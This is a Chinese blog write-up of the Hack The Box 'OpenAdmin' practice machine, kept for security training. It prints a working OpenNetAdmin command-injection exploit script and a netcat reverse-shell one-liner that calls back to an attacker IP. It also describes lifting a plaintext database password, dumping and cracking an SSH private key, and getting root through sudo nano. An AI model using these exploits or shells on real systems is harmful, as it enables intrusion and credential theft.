前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Hackthebox_OpenAdmin

Hackthebox_OpenAdmin

原创
作者头像
用户7118204
修改于 2020-04-07 03:51:07
修改于 2020-04-07 03:51:07
33100
代码可运行
举报
运行总次数:0
代码可运行

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“OpenAdmin”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。

攻略要点:

opennetadmin RCE getshell

jimmy ssh密码窃取 & joanna ssh密钥窃取

nano获得 root flag

信息收集:

nmap 扫出了 22 , 80 端口

查看80端口

用gobuster扫描目标url,并且发现了 artwork/ 和 music/

opennetadmin后台泄露 & RCE

发现 music/ 页面下的登录按钮跳转后台,用户为 guest

发现使用的是 opennetadmin 后台

使用searchsploit找到相关的RCE漏洞

[47691.sh](https://www.exploit-db.com/exploits/47691)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
root@localhost:~/hackthebox_workspace/finish/Openadmin# cat pwn.sh 
#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done    

Getshell:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
root@localhost:~/hackthebox_workspace/finish/Openadmin# ./pwn.sh http://10.10.10.171/ona/login.php                 
$ pwd                                                                                                              
/opt/ona/www

jimmy 密码泄露

发现这个 shell 只能用于当前路径

传 webshell ,并生成 nc 反弹 shell

http://10.10.10.171/ona/xxx.php?0=rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%2010.10.xx.xxx%20xxxx%20%3E/tmp/f

拿到 shell 之后枚举用户

发现了 jimmy 和 joanna 用户

在 /opt/ona/www/local/config 文件夹下面找到明文密码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

ssh尝试使用密码登录 jimmy 和 joanna

发现密码的用户为 jimmy

Joanna 密钥泄露

jimmy 没有拿 user.txt 的权限,我们需要拿下 joanna 用户,在 /var/www/ 下发现了文件夹 internal 的所有者为 joanna

internal/main.php 会输出 joanna 的 ssh 私钥

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };                    
# Open Admin Trusted                                     
# OpenAdmin                                              
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";                               
?>                                                       
<html>                                                   
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session                                                  
</html> 

查看网络服务

发现一个奇怪的服务端口为 52846

猜测为 main.php 所在的服务,并且随手访问一下,获得私钥

把私钥考到 kali 本地,ssh2john 获取哈希,再利用john 破解哈希获得密码

密码为 bloodninjas

利用私钥 ssh 登录为 joanna

得到 user.txt

sudo -l 后得到提示

用 sudo 跑 nano 编辑器可获取 root 权限

输入 ^ + R 读取 ~/root.txt

手握日月摘星辰,安全路上永不止步。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【HTB】OpenAdmin
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
yichen
2020/03/06
8070
【HTB】OpenAdmin
Hack the box-Traverxec
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Traverxec”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
1.1K0
Hack the box-Traverxec
Hack the box-Network
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Network”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。
Khan安全团队
2020/03/08
7350
Hack the box-Network
Hack the box_Wall
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
6470
Hack the box_Wall
HackTheBox chaos writeup
大家好,我是大白,鉴于在强网杯中受到了打击,决定努力提升一下自己姿势水平,先去hackthebox刷一波退役靶机
黑伞安全
2019/10/16
9200
HackTheBox chaos writeup
HTB:Charon渗透测试
靶机地址:https://www.hackthebox.eu/home/machines/profile/42
亿人安全
2022/08/30
7090
HTB:Charon渗透测试
渗透测试|HackTheBox–Traverxec靶机详细渗透过程
var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();
TRY博客-简单的网络技术
2022/09/08
5770
渗透测试|HackTheBox–Traverxec靶机详细渗透过程
HackTheBox—ScriptKiddi
开放了22,5000,8000,8888端口,但5000端口和8888端口打开是拒绝访问,所以从5000端口入手
字节脉搏实验室
2021/07/09
5430
Hack the Box - Obscurity
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Obscurity”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/20
2K0
Hack the box-Json
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Json”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/09
7860
Hack the box-Json
记一次对Hackmyvm-Area51靶机的渗透测试
下载完Area51.ova后,使用Oracle VM VirtualBox导入即可
亿人安全
2022/06/30
3950
记一次对Hackmyvm-Area51靶机的渗透测试
Hack the box-Ellingson
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Ellingson”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为困难级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/08
7370
Hack the box-Ellingson
迷糊的提权方式以及利用ssrf到最终提权靶机
因为是连了vpn的所以可以直接扫目标ip:10.10.11.111拿到目标 只有ip 那就先扫端口nmap -v -sSV -Pn 10.10.11.111 -T4 -sC
亿人安全
2022/06/30
1.5K0
迷糊的提权方式以及利用ssrf到最终提权靶机
Hack the box-Heist
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Heist”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
9770
Hack the box-Heist
Hack the box-Jarvis
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Jarvis”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为困难级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/08
6930
Hack the box-Jarvis
Hack the box - Mango
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Mango”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
2.6K1
Hack the box - Mango
HTB渗透之Tenten
Tenten 是一个中等难度的靶机,知识点涉及 WordPress 插件利用、SSH 密钥爆破、SSH 私钥登录、sudo 提权等。感兴趣的同学可以在HackTheBox中进行学习。
亿人安全
2022/12/23
5040
HTB渗透之Tenten
从Vulbhub-djinn靶机学习命令注入和Python input() 漏洞
靶机描述:Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well asVMWare compatible. The DHCP will assign an IPautomatically. You'll see the IP right on the loginscreen. You have to find and read two flags (user androot) which is present in user.txt and root.txtrespectively. Format: Virtual Machine (Virtualbox - OVA) Operating System: Linux
Power7089
2019/12/12
8100
从Vulbhub-djinn靶机学习命令注入和Python input() 漏洞
【HTB】Mango
https://www.yuque.com/hxfqg9/bt9vi8/ub1ewz
yichen
2020/04/01
9450
HackTheBox - Machines - GoodGames
只有一个tcp 80 端口开放,并且有域名,那么在 c:\windows\system32\drivers\etc\hosts 文件中添加ip对应的域名即可成功访问。
kam1
2022/03/08
7230
HackTheBox - Machines - GoodGames
相关推荐
【HTB】OpenAdmin
更多 >
领券
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验